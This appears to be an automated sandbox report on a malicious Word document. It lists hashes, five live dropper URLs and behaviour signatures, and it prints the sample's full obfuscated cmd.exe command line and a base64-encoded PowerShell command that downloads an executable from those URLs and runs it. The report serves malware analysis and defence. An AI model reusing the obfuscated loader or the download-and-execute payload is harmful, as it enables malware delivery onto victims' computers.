Overview

overview

10

Static

static

8

07ee44f9fa...18.doc

windows7-x64

10

07ee44f9fa...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    29-04-2024 14:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    07ee44f9fa9188be620b38bd4494fd6c_JaffaCakes118.doc

  • Size

    83KB

  • MD5

    07ee44f9fa9188be620b38bd4494fd6c

  • SHA1

    b079fbd5595c53ff4b8aee51aaece7792fb2eef6

  • SHA256

    fa22225bbaa33be9c57bf5bc3588b3e5dd4a6bcd531eb10fdf28ae5dc7c950f6

  • SHA512

    f86324391f3d32f7dde4d65bc70cfc1a260ae0b48dfa992bef94b604f775af0d0ed949245e8e6aff3163b788df0719f33502f0c9c0f49357d3360a95faa91db5

  • SSDEEP

    1536:SptJlmrJpmxlRw99NBk+aHJU4rTDUdUNAMeWT:Ote2dw99fb4r3UdqAMe

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://blog.bctianfu.cn/4
exe.dropper

http://mail.vcacademy.lk/5nLo
exe.dropper

http://lamemoria.in/2ib2Pt
exe.dropper

http://tropicalislandrealtyofflorida.com/NNqM7W
exe.dropper

http://businessarbitr.ru/E

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\07ee44f9fa9188be620b38bd4494fd6c_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2732
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /v^:^ON^ ^ /c" ^Se^T ^ A^K=A^ACA^gAA^I^A^ACA^gA^A^I^A^AC^A^gAAIA^ACAg^A^AI^A^ACA^gAA^I^A^ACAgAQfA0^H^A7^BA^a^AMG^A0^BQ^Y^AM^GA9^B^w^O^As^GAh^B^QZ^A^I^HAiBwOAc^EAC^B^A^aA^QC^A^g^A^QbA^UG^A^0B^QSA^0CAlBwaA8GA^2B^gb^AkEA^7A^QKAc^E^AC^B^A^a^AQC^A^gAALAU^EAjBw^Q^A^QC^A^oAQZA^wG^A^p^BgR^AQG^Ah^Bwb^AwGAu^B^w^d^A8^G^AE^B^g^L^AE^F^A^zBgQAQCA7^BQ^e^AI^H^A0^Bwe^A^kC^AV^BAcAk^GA^kA^A^IA^4^GAp^B^AI^AU^E^A^jB^w^QA^QC^A^o^A^AaA^MG^A^hB^Q^Z^AIHAv^BgZA^s^DAn^A^QZ^A^g^H^A^lB^g^LAcC^Ar^A^QdAsGAH^BA^JAsC^AnA^A^X^AcCAr^Aw^Y^A^kG^A^sB^gY^AUHA^w^BgO^A^Y^H^A^u^B^Q^Z^A^QC^A^9A^wRA^IEA^oB^A^JAsD^AnAwNAAD^A3^AwJAACA9^AA^IA^U^H^ArBwRA^QCA^7A^QK^AcCA^ABwJA^gCA^0BQaA^wGAw^B^w^U^A4C^AnA^QR^A^8C^A1^Bgc^A^4C^A^yB^A^d^Ak^GA^i^B^gc^A^E^GAzBwc^A^UGAu^BQ^aAM^H^A^1^Bg^Y^A^8CAv^A^g^O^AAHA^0BA^d^A^gG^A^AB^wV^AcD^AN^BQcA^4E^AOBw^L^A0GAv^BwY^A4CAhB^AZA^kGAyBwbAw^G^A^mB^gZ^A8GA^5B^AdA^wGAhBQ^Z^AIH^Ak^Bgb^A^EG^As^BwcAkG^As^B^QY^AMG^ApBAc^A^8G^AyBAdA8CAvA^g^OA^AH^A0^B^A^dAgG^AA^B^A^dAA^FAyA^g^YA^k^GA^y^A^wL^A^4^G^A^pB^gLA^E^GAp^B^gcA8^G^A^tB^Q^Z^A0^GAhBAbA8CAvA^gOAAHA0BA^dA^g^G^A^A^B^wbAw^E^A^u^BQN^A^8CArBAb^A^4CA^5^BQ^b^AU^GA^kBQY^A^MGA^h^B^wY^AYH^Au^AAb^A^k^G^AhB^QbA^8C^Av^AgO^A^AH^A0BA^d^A^gGA^A^B^ANA^8CA^u^BwYA4C^A1B^g^Z^A^4^G^Ah^B^Q^aA^QHA^jBg^YA^4CAn^Bwb^AwG^AiB^w^LA^8C^A^6AAcA^QH^A0^BAa^AcCA9A^QVAA^H^A^p^BAJA^sDA0^BgbA^UGA^p^B^AbA^M^E^AiBQZ^Ac^F^AuAAd^A^U^G^A^O^BAI^A^Q^HAjB^QZAoGA^i^B^w^bA0C^A3B^Q^Z^A4GA9A^QUAMHAC^B^AJ^ ^e- lle^h^sr^ewop&& ^F^oR /^L %^9 ^iN (^ ^ ^ ^965^ ^, ^ ^ -1 ,^ ^ ^0) ^dO ^S^Et G^Fr^1=!G^Fr^1!!A^K:~ %^9, 1!& ^i^F %^9 LsS ^1 cA^l^L %G^Fr^1:^~-^966% "
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2456
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -e JABCAHMAUQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAHAAVQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBnAC4AYgBjAHQAaQBhAG4AZgB1AC4AYwBuAC8ANABAAGgAdAB0AHAAOgAvAC8AbQBhAGkAbAAuAHYAYwBhAGMAYQBkAGUAbQB5AC4AbABrAC8ANQBuAEwAbwBAAGgAdAB0AHAAOgAvAC8AbABhAG0AZQBtAG8AcgBpAGEALgBpAG4ALwAyAGkAYgAyAFAAdABAAGgAdAB0AHAAOgAvAC8AdAByAG8AcABpAGMAYQBsAGkAcwBsAGEAbgBkAHIAZQBhAGwAdAB5AG8AZgBmAGwAbwByAGkAZABhAC4AYwBvAG0ALwBOAE4AcQBNADcAVwBAAGgAdAB0AHAAOgAvAC8AYgB1AHMAaQBuAGUAcwBzAGEAcgBiAGkAdAByAC4AcgB1AC8ARQAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQARwBrAHUAIAA9ACAAJwA3ADAANwAnADsAJABoAEIARwA9ACQAZQBuAHYAOgBwAHUAYgBsAGkAYwArACcAXAAnACsAJABHAGsAdQArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQwBjAEUAIABpAG4AIAAkAGkAcABVACkAewB0AHIAeQB7ACQAQgBzAFEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAQwBjAEUALAAgACQAaABCAEcAKQA7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAaABCAEcAOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0AfQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2500

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      c276feabd6d5bf58af34325ce71b955f

      SHA1

      16b2e2348bff9a20a002f10e8e91a37c716620d8

      SHA256

      dc2a3de67d48d33c0971717b48384418469f0e48188a641e959d167e83e375a2

      SHA512

      c98303c114aa42cd54f4c9c78c589f4dd4fe74162ff2736c0dc21035b7795bed590f2784a5548dee98e04144bf92c95c23dacf3bb3743d22fcee703dbb3a7b78

      Download Submit

    • memory/2204-40-0x0000000006850000-0x0000000006950000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2204-2-0x000000007141D000-0x0000000071428000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2204-43-0x0000000006850000-0x0000000006950000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2204-42-0x0000000006850000-0x0000000006950000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2204-41-0x0000000006850000-0x0000000006950000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2204-0-0x000000002F9F1000-0x000000002F9F2000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2204-29-0x0000000006850000-0x0000000006950000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2204-13-0x0000000006850000-0x0000000006950000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2204-51-0x000000007141D000-0x0000000071428000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2204-52-0x0000000006850000-0x0000000006950000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2204-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2204-67-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2204-68-0x000000007141D000-0x0000000071428000-memory.dmp

      Filesize

      44KB

      Download